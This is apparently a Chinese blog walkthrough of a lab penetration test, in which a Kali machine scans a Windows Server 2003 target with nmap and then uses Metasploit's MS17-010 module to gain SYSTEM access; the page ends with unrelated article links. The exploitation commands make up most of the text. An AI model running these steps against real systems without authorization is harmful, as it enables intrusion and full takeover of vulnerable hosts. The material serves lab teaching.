主机 渗透

1:kali

靶机:Windows Server 2003

端口扫描

1.用nmap端口扫描靶机

nmap -sP 192.168.157.0/24 #扫描192.168.157.0这个网段存活的主机

靶机的IP为192.168.157.130

2

nmap -sV192.168.157.130 -p- #-sV 参数用于启用版本检测,192.168.157.130 是目标主机的IP地址,-p- 参数用于扫描所有端口

msfconsole
1. ms17_101

search ms17_010 #询问有关"ms17_010"的漏洞信息

2.use

use 1 #利用1这个模块

3.options

show options #列出模块所需的各种参数

4.set

set rhosts 192.168.157.130 # 设置远程目标主机的IP地址为192.168.157.130

5.exploit

exploit #执行攻击

6.获得system32,Windows最高权限

相关推荐
E***U94536 分钟前
前端安全编程实践
前端·安全
数据堂官方账号1 小时前
行业洞见 | AI鉴伪:数据驱动的数字安全变革
人工智能·安全
x***B4111 小时前
React安全编程实践
前端·安全·react.js
wanhengidc1 小时前
云手机中的数据通常存储在哪里?
运维·服务器·安全·web安全·智能手机
讨厌下雨的天空1 小时前
网络基础
网络·1024程序员节
0和1的舞者2 小时前
《网络编程核心概念与 UDP Socket 组件深度解析》
java·开发语言·网络·计算机网络·udp·socket
华普微HOPERF2 小时前
Matter协议,如何赋能智能家居构建跨生态的互操作网络?
网络·智能家居
河南博为智能科技有限公司3 小时前
动环监控终端-守护变电站安全运行的智能核心
运维·服务器·网络·物联网
无心水3 小时前
【Python实战进阶】5、Python字符串终极指南:从基础到高性能处理的完整秘籍
开发语言·网络·python·字符串·unicode·python实战进阶·python工业化实战进阶
Top`4 小时前
两个服务之间传递的数据本质上是字节码(Byte Stream)
网络